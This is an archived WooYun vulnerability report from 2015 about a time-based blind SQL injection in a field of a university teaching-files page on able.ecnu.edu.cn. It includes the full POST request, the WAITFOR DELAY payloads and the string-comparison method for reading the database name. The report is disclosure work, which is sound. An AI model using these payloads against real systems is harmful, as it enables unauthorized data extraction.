乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-08: 细节已通知厂商并且等待厂商处理中 2015-11-10: 厂商已经确认,细节仅向厂商公开 2015-11-20: 细节向核心白帽子及相关领域专家公开 2015-11-30: 细节向普通白帽子公开 2015-12-10: 细节向实习白帽子公开 2015-12-25: 细节向公众公开
POST /Able.Acc2.Web/Page_TeachFiles.aspx HTTP/1.1Content-Length: 3301Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://able.ecnu.edu.cnCookie: ASP.NET_SessionId=b3gfzw45bfnu2iqeagrhlq55; AbleAcc2Language=zh-CNHost: able.ecnu.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*ctl00%24ContentPlaceHolder1%24btnSearch=%e6%90%9c%e7%b4%a2&ctl00%24ContentPlaceHolder1%24acEndDate=01/01/1967&ctl00%24ContentPlaceHolder1%24acStartDate=01/01/1967&ctl00%24ContentPlaceHolder1%24txtfOrganizationName=iyevrtgt&ctl00%24ContentPlaceHolder1%24txtfTitle=r'if(len(db_name())=4) waitfor delay '0:0:5' -- &ctl00%24Home_Login1%24ImgBtnLogin=&ctl00%24Home_Login1%24txtCode=94102&ctl00%24Home_Login1%24txtLoginID=iyevrtgt&ctl00%24Home_Login1%24txtPassword=g00dPa%24%24w0rD&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWCALyjJjnDwKJicKUAwKC7pXpBwLb9ZTGDQL4naSuCwKN36n1DwKPupWbAgL3uvOGApdkC38vyINV8fHsP83bdFS35W44&__VIEWSTATE=/wEPDwUJNDEzODk5ODk1DxYGHgtfZlNvcnRGaWxlZAULZkNyZWF0ZURhdGUeBl9mU29ydAUEREVTQx4HX1F1ZXJ5XzK0BgABAAAA/////wEAAAAAAAAADAIAAABPQWJsZS5BQ0MuU2hvd1N5c3RlbUNsYXNzLCBWZXJzaW9uPTEuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49bnVsbAwDAAAATlN5c3RlbS5EYXRhLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQUBAAAAKEFibGUuQUNDLlNob3dTeXN0ZW1DbGFzcy50VGVhY2hGaWxlUXVlcnkQAAAADV9mVGVhY2hGaWxlSUQOX2ZUZWFjaExldmVsSUQLX2ZTZWFyY2hLZXkHX2ZUaXRsZRJfZk9yZ2FuaXphdGlvbk5hbWUKX1N0YXJ0RGF0ZQhfRW5kRGF0ZQhfT3JkZXJCeQlfV2hlcmVTdHIRUGFyYW1zQ29sbGVjdGlvbmcLaW5wdXRPdXRwdXQUUXVlcnlCYXNlK19QYWdlSW5kZXgTUXVlcnlCYXNlK19QYWdlU2l6ZRtRdWVyeUJhc2UrUGFyYW1zQ29sbGVjdGlvbmcVUXVlcnlCYXNlK2lucHV0T3V0cHV0FUNsYXNzQmFzZStpbnB1dE91dHB1dAAAAQEBAAABAQMEAAADBAQICA0NHFN5c3RlbS5Db2xsZWN0aW9ucy5BcnJheUxpc3QeU3lzdGVtLkRhdGEuUGFyYW1ldGVyRGlyZWN0aW9uAwAAAAgIHFN5c3RlbS5Db2xsZWN0aW9ucy5BcnJheUxpc3QeU3lzdGVtLkRhdGEuUGFyYW1ldGVyRGlyZWN0aW9uAwAAAB5TeXN0ZW0uRGF0YS5QYXJhbWV0ZXJEaXJlY3Rpb24DAAAAAgAAAP//////////BgQAAAAACQQAAAAJBAAAAAAAAAAAAAAAAAAAAAAAAAAJBAAAAAkEAAAACgX7////HlN5c3RlbS5EYXRhLlBhcmFtZXRlckRpcmVjdGlvbgEAAAAHdmFsdWVfXwAIAwAAAAMAAAD//////////woB%2bv////v///8DAAAAAfn////7////AwAAAAsWAmYPZBYEAgEPZBYCAgMPFgIeB2NvbnRlbnQFDOivvueoi%2bS4reW/g2QCAw9kFg4CAQ8PFgIeB1Zpc2libGVoZBYCZg8QDxYGHg1EYXRhVGV4dEZpZWxkBQVmTmFtZR4ORGF0YVZhbHVlRmllbGQFBGZLZXkeC18hRGF0YUJvdW5kZ2QQFQcG5Lit5paHB0VuZ2xpc2gJRnJhbsOnYWlzB0RldXRzY2gJ5pel5pys6KqeDtCg0YPRgdGB0LrQuNC5CEVzcGHDsW9sFQcFemgtQ04FZW4tVVMGZnJlbmNoBmdlcm1hbghqYXBhbmVzZQJSVQdzcGFuaXNoFCsDB2dnZ2dnZ2cWAWZkAgQPFgIeBFRleHQFBuWkp%2bWtpmQCBg8PFgIeDV9TZWxlY3RlZE1lbnUFCEhvbWVQYWdlZBYCZg8PFgQeCENzc0NsYXNzBQlzZWxlY3RuYXYeBF8hU0ICAmRkAggPDxYCHgtfU2VsZWN0ZWRJRAL/////D2QWAmYPFgIeC18hSXRlbUNvdW50AgIWBGYPZBYCAgEPDxYGHwplHgtOYXZpZ2F0ZVVybAUffi9QYWdlX09yZ2FuaXphdGlvbi5hc3B4P0lEPTIyOB8LAgJkFgJmDxUBA%2bezu2QCAQ9kFgICAQ8PFgYfCmUfDgUffi9QYWdlX09yZ2FuaXphdGlvbi5hc3B4P0lEPTIyOR8LAgJkFgJmDxUBCemdnumZouezu2QCCQ9kFgICAg9kFgxmDw9kFgIeCW9ua2V5ZG93bgVAamF2YXNjcmlwdDpyZXR1cm4gU2V0Rm9jdXNOZXh0KCdjdGwwMF9Ib21lX0xvZ2luMV90eHRQYXNzd29yZCcpO2QCAQ8PZBYCHw8FPGphdmFzY3JpcHQ6cmV0dXJuIFNldEZvY3VzTmV4dCgnY3RsMDBfSG9tZV9Mb2dpbjFfdHh0Q29kZScpO2QCAw8PZBYCHw8FQ2phdmFzY3JpcHQ6cmV0dXJuIFJhaXNlQ2xpY2tFdmVudCgnY3RsMDBfSG9tZV9Mb2dpbjFfSW1nQnRuTG9naW4nKTtkAgUPDxYCHgxFcnJvck1lc3NhZ2UFFeivt%2bi%2bk%2bWFpeeUqOaIt%2bWQje%2b8gWRkAgYPDxYCHxAFEuivt%2bi%2bk%2bWFpeWvhuegge%2b8gWRkAgcPDxYCHxAFFeivt%2bi%2bk%2bWFpemqjOivgeegge%2b8gWRkAgsPZBYGAgUPFgIfCGVkAgYPFgIfDWZkAgcPFgIfDWZkAg0PZBYGAgEPFgIfCAUS5Y2O5Lic5biI6IyD5aSn5a2mZAIDDw8WBB8IZR8OZWRkAgUPFgIfCGVkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBR1jdGwwMCRIb21lX0xvZ2luMSRJbWdCdG5Mb2dpbt71zHZSnMxixwxm1Gue5d8X8CJy
ctl00%24ContentPlaceHolder1%24txtfTitle参数存在注入
r'if(len(db_name())=4) waitfor delay '0:0:5' --
db长度为4:
substring被过滤了,使用字符串比较获取数据:#db第一位:
r'if(db_name()>'a') waitfor delay '0:0:5' --
存在延迟
r'if(db_name()>'b') waitfor delay '0:0:5' --
不存在延迟
db第一位为b如此依次比较就可以获取全部db的数据~
危害等级:高
漏洞Rank:10
确认时间:2015-11-10 08:22
通知二级单位处理。
暂无